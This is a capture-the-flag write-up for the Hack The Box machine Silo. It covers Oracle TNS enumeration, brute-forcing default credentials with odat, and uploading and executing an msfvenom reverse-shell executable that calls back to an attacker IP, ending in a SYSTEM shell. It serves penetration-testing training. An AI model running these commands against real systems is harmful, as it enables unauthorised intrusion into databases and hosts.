Hack The Box — Silo — without Metasploit (TJNull’s list for OSCP)

Daniyal Ahmed
3 min readJun 17, 2023

--

silo.htb

This is my 29th write-up for Silo, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.

In a general penetration test or a CTF, there are usually 3 major phases that are involved.

  1. Enumeration and Scanning (Information Gathering).
  2. Initial Foothold.
  3. Privilege Escalation.

Let’s get started with the box!

Enumeration

First, let’s run an nmap scan on default ports to see what services are running on the target system.

nmap -sC -sV -O -Pn -oA nmap/initial silo.htb
nmap initial

So, we have an HTTP server running and Orcale TNS listener on ports 1521 and 4196.

Let’s jump to the HTTP server and see what we have there.

http server

Default page for Microsoft IIS. Let’s try directory busting and see if we get anything.

gobuster dir -u http://silo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x asp,,db,jsp,html,log,txt -t 200 -k --no-error

But it does not reveal anything.

Let’s try enumerating the Oracle TNS listener. We will be using odat (Oracle Database Attacking Tool) for that.

First, let’s enumerate the valid SIDs.

odat sidguesser -s silo.htb -p 1521

XE seems to be a valid SID for the server.

There’s a default users list in Metasploit, let’s locate it and copy it.

locate oracle_default_userpass.txt
cp /usr/share/metasploit-framework/data/wordlists/oracle_default_userpass.txt .
oracle default userpass

The username and passwords in this list are separated by a space instead of a forward slash (/). We’ll have to change it to forward slash so that the ODAT tool is able to parse the file. This can be done in vi using the following command.

 :%s/ /\//g

So, that the file looks something like this:

Now let’s use this to brute force the credentials.

odat passwordguesser -s silo.htb -p 1521 -d XE --accounts-file /root/TJNull/Windows/Silo/oracle_default_userpass.txt

(You may have to give full path of the oracle_default_userpass.txt file)

credentials

And we got the credentials scott/tiger

Initial Foothold

ODAT has a utlfile module that allows you to upload, download or delete a file. Since, we are trying to get code execution on the box, let’s upload a malicious executable that sends a reverse shell back to our attack machine.

For that, first we need to generate a shell for windows.

msfvenom -p windows/shell_reverse_tcp LHOST="10.10.16.5" LPORT=4242 -f exe > shell.exe

Now, let’s upload the file using the utlfile module.

odat utlfile -s silo.htb -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp shell.exe shell.exe 
insufficient privileges

We get a privilege error. Just add sysdba flag in the command.

odat utlfile -s silo.htb -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp shell.exe /root/TJNull/Windows/Silo/shell.exe --sysdba
shell uploaded

Let’s start a listener and execute it using externaltable.

odat externaltable -s silo.htb -p 1521 -U "scott" -P "tiger" -d XE --exec /temp shell.exe --sysdba
system shell

And we got a system shell! No Privilege Escalation needed.

:)

--

--

Daniyal Ahmed
Daniyal Ahmed

No responses yet